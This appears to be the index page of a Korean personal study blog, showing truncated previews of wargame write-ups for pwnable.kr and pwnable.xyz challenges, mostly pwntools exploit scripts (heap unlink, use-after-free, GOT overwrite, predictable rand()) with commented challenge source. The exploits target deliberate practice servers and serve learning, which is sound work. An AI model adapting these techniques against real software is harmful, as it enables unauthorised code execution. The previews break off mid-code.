대충공부한거적어두는블로그

from pwn import * p = remote("svc.pwnable.xyz", 30008) p.recvuntil("x: ") p.send("1336") p.recvuntil("y: ") p.send("4294967295") p.recvline() p.sendline("3 1431656211") p.recvline() p.sendline("1 1 1 3 3") p.interactive() int __cdecl main(int argc, const char **argv, const char **envp) { setup(argc, argv, envp); puts("The l33t-ness level."); // 라운드 세 개 전부 통과 if ( (unsigned __int8)round_1() && (u..

from pwn import * s = ssh(user="unlink", host="pwnable.kr", port=2222, password="guest") p = s.process(executable="/home/unlink/unlink") p.recvuntil("leak: ") stkebp = int(p.recvline()[:-1], 16) + 0x14 print(hex(stkebp)) p.recvuntil("leak: ") heap_a = int(p.recvline()[:-1], 16) print(hex(heap_a)) p.recvline() ''' chunk a 활용 pay = p32(0x080484eb) + b'A'*0xc pay += p32(heap_a+0xc)+p32(stkebp-0x4) ..

#-*- coding:utf-8 -*- from pwn import * # 원래 chunk에는 Woman(Man)+16 주소 / 나이 / 이름 들어있었음 # Woman(Man)+16 주소에는 give_shell 주소 / introduce 주소 순으로 들어있엇음 # 재할당된 chunk의 첫 8B에 Human(Woman, Man)+8 주소를 덮어쓴다면 # introduce() 함수 대신 give_shell() 함수를 실행할 것임! with open("ha", "w+") as f: f.write(p64(0x401548)+p64(0x401548)+p64(0x401548)) # 0x401568, 0x401588 argvs = ["" for i in range(3)] argvs[1] = "24" argvs[2] =..

#include int main(){ // RealUID, EffectiveUID, SavedSetUID = shellshock_pwn setresuid(getegid(), getegid(), getegid()); // RealGID, EffectiveGID, SavedSetGID = shellshock_pwn setresgid(getegid(), getegid(), getegid()); // 프로그램 안에서 또다른 프로그램(ex. system()) 실행하면 EUID가 아닌 RUID 권한으로 실행된다 system("/home/shellshock/bash -c 'echo shock_me'"); return 0; } -r-xr-xr-x 1 root shellshock 959120 Oct 12 2014 bas..

from pwn import * s = ssh(user="random", host="pwnable.kr", port=2222, password="guest") p = s.process(executable="/home/random/random") key = 0xdeadbeef ^ 0x6b8b4567 # rand() 하면 첫 숫자로 항상 0x6b8b4567나옴 p.sendline(str(int(key))) p.interactive() #include int main(){ unsigned int random; random = rand(); // random value! unsigned int key=0; scanf("%d", &key); if( (key ^ random) == 0xdeadbeef ){ prin..

from pwn import * s = ssh(user="passcode", host="pwnable.kr", port=2222, password="guest") p = s.process(executable="/home/passcode/passcode") # No PIE이므로 코드영역, got영역 주소 그대로 p.recvuntil("enter you name : ") p.sendline(b'A'*0x60+p32(0x804a004)) # ffllush@got p.recvline() p.recvuntil("enter passcode1 : ") p.sendline(str(int(0x80485e3))) # system("/bin/cat flag") 코드부분 p.interactive() -r--r----- 1 r..

from pwn import * s = ssh(user="mistake", host="pwnable.kr", port=2222, password="guest") p = s.process(executable="/home/mistake/mistake") p.send('C'*10) p.sendlineafter('input password : ', 'B'*10) p.interactive() #include #include #define PW_LEN 10 #define XORKEY 1 void xor(char* s, int len){ int i; for(i=0; i 0)){ printf("read error\n"); close(fd); return 0; } char pw_buf2[PW_LEN+1]; printf(..

// compiled with : gcc -o memcpy memcpy.c -m32 -lm (32bit, math 관련 라이브러리) #include #include #include #include #include #include #include unsigned long long rdtsc(){ // time stamp counter를 가져오는 명령어 asm("rdtsc"); } char* slow_memcpy(char* dest, const char* src, size_t len){ int i; for (i=0; i= 64){ i = len / 64; len &= (64-1); while(i-- > 0){ __asm__ __volatile__ ( // movdqa 메모리 xxm : 메모리에 있는 16B ..

from pwn import * s = ssh(user="lotto", host="pwnable.kr", port=2222, password="guest") p = s.process(executable="/home/lotto/lotto") guess = "\x22"*6 cnt = 0 while True: cnt += 1 p.recvuntil("Exit\n") p.sendline("1") p.recvuntil("bytes : ") p.send(guess) p.recvline() res = p.recvline() print(res) if res[0:3]!=b'bad' or cnt>50: break print("Brute Force Haha...") #include #include #include #inclu..

#include #include int key1(){ asm("mov r3, pc\n"); } int key2(){ asm( "push {r6}\n" "add r6, pc, $1\n" "bx r6\n" ".code 16\n" "mov r3, pc\n" "add r3, $0x4\n" "push {r3}\n" "pop {pc}\n" ".code 32\n" "pop {r6}\n" ); } int key3(){ asm("mov r3, lr\n"); } int main(){ int key=0; printf("Daddy has very strong arm! : "); scanf("%d", &key); if( (key1()+key2()+key3()) == key ){ printf("Congratz!\n"); int ..